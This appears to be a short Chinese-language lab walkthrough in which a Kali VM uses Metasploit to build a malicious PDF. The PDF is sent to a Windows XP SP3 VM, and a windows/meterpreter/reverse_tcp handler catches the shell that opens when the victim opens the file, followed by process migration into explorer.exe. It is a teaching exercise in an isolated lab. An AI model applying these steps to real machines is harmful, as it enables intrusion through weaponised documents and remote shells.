两台虚拟机:
kali ip:192.168.96.130
windows xp sp3 ip:192.168.96.133
-
1.kali下打开显示隐藏文件
-
2.在kali终端中开启msfconsole。
-
3.进入该漏洞模块并设置攻击有效载荷
-
4.查看需要需要设置的数据,并设置相应的参数
-
5.查看设置的参数信息
-
6.打开exploit生成渗透攻击的pdf文件
-
7.将渗透文件发送到靶机,使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
-
8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,并设置相关的端口、ip等信息,需要与之前生成渗透文件的设置一样
-
9.靶机打开pdf文件,攻击机启动exploit
-
10.sysinfo可以查看到靶机信息(忘了截图)
-
11.使用ps查看当前进程,并找到explorer.exe的进程号转移到改进程号,输入图shell,获取靶机的shell